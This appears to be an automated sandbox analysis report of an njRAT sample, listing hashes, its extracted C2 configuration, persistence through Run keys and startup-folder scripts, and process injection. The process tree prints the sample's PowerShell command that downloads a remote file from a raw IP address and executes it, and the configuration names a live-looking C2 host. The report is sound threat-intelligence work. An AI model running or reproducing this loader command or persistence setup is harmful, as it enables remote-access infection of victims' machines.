Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
05-11-2021 12:37
Static task
static1
Behavioral task
behavioral1
Sample
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
Resource
win10-en-20211014
General
-
Target
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
-
Size
4KB
-
MD5
b9a1c7dd8171afe0e3fc1524f5eafb18
-
SHA1
19b79357841b2bcb3438011f4c8e45f7278aeaa9
-
SHA256
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd952a7da01de33ad60ef
-
SHA512
d57c9cf4a489dec1f8b17351173e1ffc202e454f214b85e132fbd5d8af2d4a611e50e1a7f85eb0dfce438539aaec3b143d1fafafbaa0def914f6401c5993da6d
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
redlan.linkpc.net:5553
3b407dd04ed042
-
reg_key
3b407dd04ed042
-
splitter
@!#&^%$
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 18 IoCs
Processes:
powershell.exewscript.exeflow pid process 9 4404 powershell.exe 25 4272 wscript.exe 27 4272 wscript.exe 30 4272 wscript.exe 31 4272 wscript.exe 32 4272 wscript.exe 33 4272 wscript.exe 34 4272 wscript.exe 35 4272 wscript.exe 36 4272 wscript.exe 37 4272 wscript.exe 38 4272 wscript.exe 39 4272 wscript.exe 40 4272 wscript.exe 41 4272 wscript.exe 42 4272 wscript.exe 43 4272 wscript.exe 44 4272 wscript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exewscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpA219.tmp.JS WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpA219.tmp.JS wscript.exe -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
wscript.exeWScript.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\tmpA219 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tmpA219.tmp.JS\"" wscript.exe Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tmpA219 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tmpA219.tmp.JS\"" wscript.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\tmpA219 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tmpA219.tmp.JS\"" WScript.exe Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tmpA219 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tmpA219.tmp.JS\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\software\microsoft\windows\currentversion\run wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4404 set thread context of 4540 4404 powershell.exe AppLaunch.exe -
Drops file in Program Files directory 12 IoCs
Processes:
javaw.exedescription ioc process File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\jvm.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\jvm.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jvm.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\jvm.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\jvm.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\ntdll.pdb javaw.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\jvm.pdb javaw.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
AppLaunch.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings AppLaunch.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
powershell.exeAppLaunch.exedescription pid process Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe Token: 33 4540 AppLaunch.exe Token: SeIncBasePriorityPrivilege 4540 AppLaunch.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exepowershell.exeAppLaunch.exeWScript.exedescription pid process target process PID 4368 wrote to memory of 4404 4368 d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe powershell.exe PID 4368 wrote to memory of 4404 4368 d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe powershell.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4404 wrote to memory of 4540 4404 powershell.exe AppLaunch.exe PID 4540 wrote to memory of 2400 4540 AppLaunch.exe javaw.exe PID 4540 wrote to memory of 2400 4540 AppLaunch.exe javaw.exe PID 4540 wrote to memory of 3036 4540 AppLaunch.exe WScript.exe PID 4540 wrote to memory of 3036 4540 AppLaunch.exe WScript.exe PID 4540 wrote to memory of 3036 4540 AppLaunch.exe WScript.exe PID 3036 wrote to memory of 4272 3036 WScript.exe wscript.exe PID 3036 wrote to memory of 4272 3036 WScript.exe wscript.exe PID 3036 wrote to memory of 4272 3036 WScript.exe wscript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe"C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -c cd $env:tmp;Invoke-WebRequest http://79.155.175.45/verona.png -OutFile Error.png;gc Error.png | iex2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe3⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\tmp4C38.tmp.jar"4⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpA219.tmp.JS"4⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\tmpA219.tmp.JS"5⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp4C38.tmp.jarMD5
6fe6bac5dd75eeb70521ff947fb7008b
SHA11bceb447ec1174f0b2a34cbdf08703dc8020a6b2
SHA2560e0e37118bddbf947175118a866700bc475b80543864b28ca0870d337c0ffcd6
SHA5124cf68c825c5fdf5b53d4a92c8b24929aaf25a4f6b0e9cf5971a28428461d2343b1f786e993bdbae5b06be4f0e59c23b62eff2ad9dbf32e8ec6ce78df98e5c9c4
-
C:\Users\Admin\AppData\Local\Temp\tmpA219.tmp.JSMD5
f07fe7d0a3b59b69c19c450d1516158e
SHA1856a9c5c3938312c27697698e05b97fe8725db92
SHA256db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426
SHA512283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpA219.tmp.JSMD5
f07fe7d0a3b59b69c19c450d1516158e
SHA1856a9c5c3938312c27697698e05b97fe8725db92
SHA256db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426
SHA512283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db
-
C:\Users\Admin\AppData\Roaming\tmpA219.tmp.JSMD5
f07fe7d0a3b59b69c19c450d1516158e
SHA1856a9c5c3938312c27697698e05b97fe8725db92
SHA256db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426
SHA512283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db
-
memory/2400-190-0x0000000003070000-0x0000000003080000-memory.dmpFilesize
64KB
-
memory/2400-188-0x0000000003060000-0x0000000003070000-memory.dmpFilesize
64KB
-
memory/2400-192-0x0000000003090000-0x00000000030A0000-memory.dmpFilesize
64KB
-
memory/2400-193-0x00000000030A0000-0x00000000030B0000-memory.dmpFilesize
64KB
-
memory/2400-179-0x0000000000000000-mapping.dmp
-
memory/2400-191-0x0000000003080000-0x0000000003090000-memory.dmpFilesize
64KB
-
memory/2400-189-0x0000000000E50000-0x0000000000E51000-memory.dmpFilesize
4KB
-
memory/2400-181-0x0000000002DD0000-0x0000000003040000-memory.dmpFilesize
2.4MB
-
memory/2400-187-0x0000000003050000-0x0000000003060000-memory.dmpFilesize
64KB
-
memory/2400-182-0x0000000002DD0000-0x0000000003040000-memory.dmpFilesize
2.4MB
-
memory/2400-186-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/2400-183-0x0000000000E50000-0x0000000000E51000-memory.dmpFilesize
4KB
-
memory/3036-198-0x0000000000000000-mapping.dmp
-
memory/4272-200-0x0000000000000000-mapping.dmp
-
memory/4368-115-0x0000000000B90000-0x0000000000B91000-memory.dmpFilesize
4KB
-
memory/4404-129-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-121-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-154-0x0000023A3A3F8000-0x0000023A3A3F9000-memory.dmpFilesize
4KB
-
memory/4404-155-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-156-0x0000023A3C5D0000-0x0000023A3C5DB000-memory.dmpFilesize
44KB
-
memory/4404-117-0x0000000000000000-mapping.dmp
-
memory/4404-118-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-159-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-119-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-144-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-120-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-128-0x0000023A3C650000-0x0000023A3C651000-memory.dmpFilesize
4KB
-
memory/4404-122-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-123-0x0000023A3A370000-0x0000023A3A371000-memory.dmpFilesize
4KB
-
memory/4404-124-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-125-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-126-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-127-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-143-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-141-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4404-140-0x0000023A3A3F6000-0x0000023A3A3F8000-memory.dmpFilesize
8KB
-
memory/4404-139-0x0000023A3A3F3000-0x0000023A3A3F5000-memory.dmpFilesize
8KB
-
memory/4404-138-0x0000023A3A3F0000-0x0000023A3A3F2000-memory.dmpFilesize
8KB
-
memory/4404-137-0x0000023A205A0000-0x0000023A205A2000-memory.dmpFilesize
8KB
-
memory/4540-160-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/4540-172-0x0000000009C30000-0x0000000009C31000-memory.dmpFilesize
4KB
-
memory/4540-171-0x00000000099D0000-0x00000000099D1000-memory.dmpFilesize
4KB
-
memory/4540-169-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/4540-168-0x0000000009A60000-0x0000000009A61000-memory.dmpFilesize
4KB
-
memory/4540-167-0x0000000007260000-0x00000000072FC000-memory.dmpFilesize
624KB
-
memory/4540-166-0x0000000009EC0000-0x0000000009EC1000-memory.dmpFilesize
4KB
-
memory/4540-165-0x0000000009890000-0x0000000009891000-memory.dmpFilesize
4KB
-
memory/4540-162-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/4540-161-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/4540-158-0x000000000040676E-mapping.dmp
-
memory/4540-157-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB